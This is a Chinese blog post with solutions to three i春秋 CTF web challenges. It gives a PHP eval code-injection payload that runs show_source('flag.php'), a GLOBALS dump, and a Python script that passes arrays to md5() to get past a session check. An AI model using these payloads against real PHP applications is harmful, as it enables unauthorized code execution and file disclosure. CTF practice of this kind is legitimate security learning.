美文网首页
i春秋 ctf web

i春秋 ctf web

作者: blackJdog | 来源:发表于2018-10-12 17:31 被阅读0次

爆破-1

全局变量$GLOBALS
?hello=GLOBALS

爆破-2

命令注入
?hello=);show_source('flag.php');//

eval( "var_dump($a);");
eval( "var_dump();show_source('flag.php');//);");

爆破-3

目标
$_SESSION['nums']>=10
条件
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;

md5()如果参数是数组则返回0
第一次请求参数为value[]=e&value[]=a

#coding=utf-8
import requests

url='http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com?value[]=e&value[]=a'
r=requests.get(url)
cookies={'PHPSESSID':r.headers['Set-Cookie'][10:36]}#获得会话id
for i in xrange(11):
    url='http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com?value[]={0}&value[]={1}'.format(r.content[0:1],r.content[1:2])
    print url
    r=requests.get(url,cookies=cookies)
    if i==10:
        print r.content

相关文章

  • i春秋 ctf web

    爆破-1 全局变量$GLOBALS?hello=GLOBALS 爆破-2 命令注入?hello=);show_so...

  • i春秋CTF WEB-爆破

    爆破1,2,3 看似是爆破,其实可以直接GLOBALS查看所有的全局变量,其实考的是文件包含,六位字符的爆破实在是...

  • i春秋CTF-WEB-Code

    分析 打开url,发现是一个读取文件的过程,一开始还以为是文件包含,其实直接读文件即可: 读了一下index.ph...

  • CTF中的几种git泄露

    git泄露是常见的ctf题型,来看几个例子 Hello World (i春秋 第二届春秋欢乐赛 web) 这里只说...

  • i春秋CTF Upload

    分析 可以上传任意文件,并且上传之后可以打开文件(源码有链接/u/xx.php),想到上传一段php代码来打开fl...

  • 实验吧-登陆一下好吗

    登陆一下好吗 原题链接 http://ctf5.shiyanbar.com/web/wonderkun/web/i...

  • [i春秋]Web

    “百度杯”CTF比赛 2017 二月场_爆破-1 题目内容:flag就在某六位变量中。 打开页面给出了源代码: 看...

  • i春秋CTF-YeserCMS

    分析 打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS 于是百度EasyCMS的漏洞,发现cmsea...

  • [CTF_web]exec/exec3.php

    CTF_web CTF_web 源码如下 : 分析 利用代码 :

  • i春秋CTF大本营

    百度杯”CTF比赛 九月场Code 分析:1、看到链接想到文件包含,读取index.php,发现源代码解密如下: ...

网友评论

      本文标题:i春秋 ctf web

      本文链接:https://www.haomeiwen.com/subject/qqugaftx.html